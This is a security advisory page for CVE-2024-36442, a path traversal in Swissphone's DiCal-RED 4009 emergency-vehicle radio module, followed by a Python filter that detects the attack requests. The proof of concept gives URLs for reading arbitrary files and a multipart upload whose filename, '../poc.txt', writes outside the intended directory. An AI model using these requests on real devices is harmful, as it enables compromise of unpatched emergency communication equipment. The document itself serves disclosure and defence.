DiCal-RED 4009 Path Traversal

23 Aug 2024 00:00:00 · Reported by Sebastian Hamann, syss.de · Type: packetstorm · Source: packetstormsecurity.com

DiCal-RED 4009 Path Traversal, High risk level, Remote code execution vulnerabilit

Related

| Reporter | Title | Published |
| --- | --- | --- |
| Circl | CVE-2024-36442 | 22 Aug 2024 17:42 |
| CVE | CVE-2024-36442 | 22 Aug 2024 00:00 |
| Cvelist | CVE-2024-36442 | 22 Aug 2024 00:00 |
| NVD | CVE-2024-36442 | 22 Aug 2024 15:15 |
| Positive Technologies | PT-2024-27002 · Swissphone · Swissphone Dical-Red 4009 | 22 Aug 2024 00:00 |
| RedhatCVE | CVE-2024-36442 | 23 May 2025 08:17 |
| Vulnrichment | CVE-2024-36442 | 22 Aug 2024 00:00 |

`Advisory ID: SYSS-2024-039  
Product: DiCal-RED  
Manufacturer: Swissphone Wireless AG  
Affected Version(s): Unknown  
Tested Version(s): 4009  
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2024-04-16  
Solution Date: None  
Public Disclosure: 2024-08-20  
CVE Reference: CVE-2024-36442  
Author of Advisory: Sebastian Hamann, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.  
  
The manufacturer describes the product as follows (see [1]):  
  
"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."  
  
Due to a path traversal issue, the device is vulnerable to the disclosure  
of arbitrary files and modification of system files, effectively leading to  
remote code execution.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The administrative web interface of the device is vulnerable to path traversal  
attacks in several places.  
  
The functions to download or display log files can be used to access arbitrary  
files on the device's file system.  
The upload function for new license files can be used to write files anywhere  
on the device's file system - possibly overwriting important system  
configuration files, binaries or scripts.  
Replacing files that are executed during system operation results in a full  
compromise of the whole device.  
  
Note that the attacker needs to be authenticated in order to exploit these  
vulnerabilities, i.e. know the administrative system password or its MD5  
hash (cf. SYSS-2024-038).  
However, due to another vulnerability (cf. SYSS-2024-040), authentication is  
not required to display file contents.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
An attacker can download the file /etc/deviceconfig via the following URL:  
http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}  
  
Alternatively, the same file can be viewed via  
http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}  
  
The following HTTP POST request uploads a file to the root directory (/) of  
the device's file system:  
  
POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1  
Host: 192.0.2.1  
Content-Length: 190  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5  
[...]  
Cookie: QSESSIONID=[...]  
  
------WebKitFormBoundarynMcoPJ7jKTghQbK5  
Content-Disposition: form-data; name="binary"; filename="../poc.txt"  
Content-Type: text/plain  
  
PoC  
  
------WebKitFormBoundarynMcoPJ7jKTghQbK5--  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer recommends not running the device in an untrusted network.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for DiCal-RED  
https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-039  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Hamann of SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
  
`
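
Since the advisory lists no fix, the two request shapes from the PoC can be flagged or blocked by a filter placed in front of the device. The following is an added example, not code from the advisory or the manufacturer; `ALLOWED_DIR` is an assumed log directory and the function names are hypothetical.

```python
import json
import posixpath
from email.message import Message
from urllib.parse import urlsplit, parse_qs

CGI_PATH = "/cgi-bin/fdmcgiwebv2.cgi"  # endpoint named in the advisory
ALLOWED_DIR = "/var/log"               # ASSUMPTION: directory holding legitimate log files

def file_path_violation(url):
    """Return a reason if a download/display request names a file outside ALLOWED_DIR."""
    parts = urlsplit(url)
    if parts.path != CGI_PATH:
        return None
    for raw in parse_qs(parts.query).get("data", []):  # parse_qs percent-decodes
        try:
            requested = json.loads(raw).get("FilePath")
        except (ValueError, AttributeError):
            return "data parameter is not a JSON object"
        if not isinstance(requested, str):
            continue
        # Lexical check only: a filter in front of the device cannot see its symlinks.
        resolved = posixpath.normpath(posixpath.join(ALLOWED_DIR, requested))
        if not resolved.startswith(ALLOWED_DIR + "/"):
            return f"FilePath resolves to {resolved}"
    return None

def upload_filename_violation(content_disposition):
    """Return a reason if a multipart part's filename is not a plain file name."""
    part = Message()
    part["Content-Disposition"] = content_disposition
    name = part.get_filename()
    if name is not None and (name in ("", ".", "..") or any(c in name for c in "/\\\x00")):
        return f"filename {name!r} contains path components"
    return None

# Constructed sample input: the two request shapes from the PoC plus benign variants.
SAMPLES = [
    ("url", "http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile"
            "&data={%22FilePath%22:%22/etc/deviceconfig%22}"),
    ("url", "http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile"
            "&data={%22FilePath%22:%22/var/log/messages%22}"),
    ("upload", 'form-data; name="binary"; filename="../poc.txt"'),
    ("upload", 'form-data; name="binary"; filename="license.lic"'),
]

def scan(samples):
    checks = {"url": file_path_violation, "upload": upload_filename_violation}
    return [checks[kind](value) for kind, value in samples]
```

`scan(SAMPLES)` returns one entry per sample: a reason string for the two PoC-shaped requests and `None` for the benign ones.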

23 Aug 2024 00:00 (current)
Vulners AI Score: 7.1 (High risk)
CVSS 3.1: 8.8
EPSS: 0.00166